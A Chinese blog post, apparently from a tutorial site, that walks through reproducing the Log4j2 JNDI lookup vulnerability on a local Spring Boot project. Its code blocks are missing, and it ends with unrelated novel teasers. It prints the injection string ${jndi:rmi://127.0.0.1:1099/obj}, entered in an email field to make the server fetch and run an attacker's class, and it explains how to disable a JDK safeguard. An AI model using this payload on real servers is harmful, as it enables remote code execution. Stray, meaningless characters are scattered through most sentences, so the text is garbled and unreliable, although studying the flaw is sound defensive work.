風(fēng)靡IT圈的史詩級(jí)漏洞log4j2的產(chǎn)生原理及復(fù)現(xiàn)

前言

注:本文僅供參考學(xué)習(xí),不構(gòu)成任何犯罪引導(dǎo)

相信就在最近兩天塞俱,不少IT圈的都在因?yàn)長og4j2,忙前忙后排查項(xiàng)目吧吏垮?

寫JAVA的都知道障涯,Log4j是用來記錄日志的,它的覆蓋率之廣以至于此次受影響的范圍可以說是核彈級(jí)別的影響了膳汪。

這個(gè)漏洞其實(shí)是取決于Log4j的一種Lookup機(jī)制唯蝶,就是當(dāng)我們做日志輸出,出現(xiàn)占位符的時(shí)候遗嗽,通過一些特殊的命令符號(hào)粘我,可以執(zhí)行一些程序代碼。

接下來我們就來復(fù)現(xiàn)所謂的Log4j2是如何執(zhí)行攻擊的,這里博主用本地的項(xiàng)目來給大家復(fù)現(xiàn)一下征字。


環(huán)境準(zhǔn)備

由于博主的本地項(xiàng)目springBoot版本會(huì)自動(dòng)引入spring-boot-starter-logging依賴,首先我們要對(duì)其去除,如下:

其次是引入我們的Log4j依賴包此洲,注:受影響的范圍為Apache Log4j 2.x <= 2.14.1

其次番宁,配置我們的Log4j.xml,就是一個(gè)最簡單的輸出配置氮昧,代碼如下:

至此漏洞的執(zhí)行環(huán)境就已經(jīng)配置完畢了框杜。

攻擊代碼準(zhǔn)備

一、攻擊服務(wù)準(zhǔn)備

博主在本地新建一個(gè)項(xiàng)目郭计,并編寫如下代碼霸琴,編寫完畢以后執(zhí)行即可。

如上代碼塊中Attack就是我們要執(zhí)行的攻擊代碼昭伸。

啟動(dòng)完成以后就可以一直掛載我們待會(huì)使用梧乘。

二、攻擊代碼準(zhǔn)備

攻擊代碼Attack是一個(gè)被編譯好了的Java文件庐杨,也就是一個(gè)Class文件选调。

我們將編譯好的攻擊class文件放在nginx目錄下,純編譯文件灵份,不帶你IDEA的路徑仁堪。如下圖:

攻擊代碼如下,不做真正的攻擊填渠,就簡單打開一個(gè)記事本弦聂。代碼如下:

將此代碼編譯完成以后的class文件放進(jìn)目錄即可。

三氛什、修改本地項(xiàng)目業(yè)務(wù)代碼

我們將本地項(xiàng)目的代碼修改為由log4j打印日志輸出莺葫,這里博主選用的是《雜貨鋪項(xiàng)目》中注冊(cè)界面的郵箱驗(yàn)證時(shí),使用log4j去輸出日志枪眉。具體代碼如下:

如上代碼捺檬,我們?yōu)楹我O(shè)置System.setProperty(“com.sun.jndi.rmi.object.trustURLCodebase”, “true”); ?

這是因?yàn)镴DK 5 U45,JDK 6 U45,JDK 7u21,JDK 8u121開始java.rmi.server.useCodebaseOnly默認(rèn)配置已經(jīng)改為true贸铜,不用自行設(shè)置堡纬。

但是JDK 6u132, JDK 7u122, JDK 8u113開始com.sun.jndi.rmi.object.trustURLCodebase默認(rèn)值已改為了false。

這里博主用的JDK版本較高蒿秦,所以必須手動(dòng)設(shè)置一下烤镐,如果你的JDK版本較低的話可以忽略。

至于具體原因以及它的作用感興趣的可以自行了解一下棍鳖。


攻擊效果展示

在郵箱輸入框中炮叶,我們輸入如下參數(shù),${jndi:rmi://127.0.0.1:1099/obj} ,然后點(diǎn)擊發(fā)送驗(yàn)證碼悴灵。

執(zhí)行結(jié)果展示為:

項(xiàng)目日志打印

我們?cè)賮砜纯丛陧?xiàng)目中的日志扛芽,你會(huì)驚訝地發(fā)現(xiàn),攻擊程序已經(jīng)在你的項(xiàng)目中執(zhí)行了积瞒!

想了解更多編程基礎(chǔ)知識(shí)便于理解各種代碼和程序可以戳教學(xué)視頻繼續(xù)學(xué)習(xí)

結(jié)語

如上原理川尖,攻擊者在攻擊代碼中可以編寫任意攻擊代碼,在對(duì)應(yīng)環(huán)境下的任何線上JAVA且使用了Log4j2的項(xiàng)目中執(zhí)行茫孔,你說叮喳,恐怖不恐怖?

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末缰贝,一起剝皮案震驚了整個(gè)濱河市馍悟,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌剩晴,老刑警劉巖锣咒,帶你破解...
    沈念sama閱讀 210,978評(píng)論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異赞弥,居然都是意外死亡毅整,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 89,954評(píng)論 2 384
  • 文/潘曉璐 我一進(jìn)店門绽左,熙熙樓的掌柜王于貴愁眉苦臉地迎上來悼嫉,“玉大人,你說我怎么就攤上這事拼窥∠访铮” “怎么了?”我有些...
    開封第一講書人閱讀 156,623評(píng)論 0 345
  • 文/不壞的土叔 我叫張陵鲁纠,是天一觀的道長总棵。 經(jīng)常有香客問我,道長房交,這世上最難降的妖魔是什么彻舰? 我笑而不...
    開封第一講書人閱讀 56,324評(píng)論 1 282
  • 正文 為了忘掉前任伐割,我火速辦了婚禮候味,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘隔心。我一直安慰自己白群,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,390評(píng)論 5 384
  • 文/花漫 我一把揭開白布硬霍。 她就那樣靜靜地躺著帜慢,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上粱玲,一...
    開封第一講書人閱讀 49,741評(píng)論 1 289
  • 那天躬柬,我揣著相機(jī)與錄音,去河邊找鬼抽减。 笑死允青,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的卵沉。 我是一名探鬼主播颠锉,決...
    沈念sama閱讀 38,892評(píng)論 3 405
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼史汗!你這毒婦竟也來了琼掠?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,655評(píng)論 0 266
  • 序言:老撾萬榮一對(duì)情侶失蹤停撞,失蹤者是張志新(化名)和其女友劉穎瓷蛙,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體戈毒,經(jīng)...
    沈念sama閱讀 44,104評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡速挑,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,451評(píng)論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了副硅。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片姥宝。...
    茶點(diǎn)故事閱讀 38,569評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖恐疲,靈堂內(nèi)的尸體忽然破棺而出腊满,到底是詐尸還是另有隱情,我是刑警寧澤培己,帶...
    沈念sama閱讀 34,254評(píng)論 4 328
  • 正文 年R本政府宣布碳蛋,位于F島的核電站,受9級(jí)特大地震影響省咨,放射性物質(zhì)發(fā)生泄漏肃弟。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,834評(píng)論 3 312
  • 文/蒙蒙 一零蓉、第九天 我趴在偏房一處隱蔽的房頂上張望笤受。 院中可真熱鬧,春花似錦敌蜂、人聲如沸箩兽。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,725評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽汗贫。三九已至身坐,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間落包,已是汗流浹背部蛇。 一陣腳步聲響...
    開封第一講書人閱讀 31,950評(píng)論 1 264
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留咐蝇,地道東北人搪花。 一個(gè)月前我還...
    沈念sama閱讀 46,260評(píng)論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像嘹害,于是被迫代替她去往敵國和親撮竿。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,446評(píng)論 2 348

推薦閱讀更多精彩內(nèi)容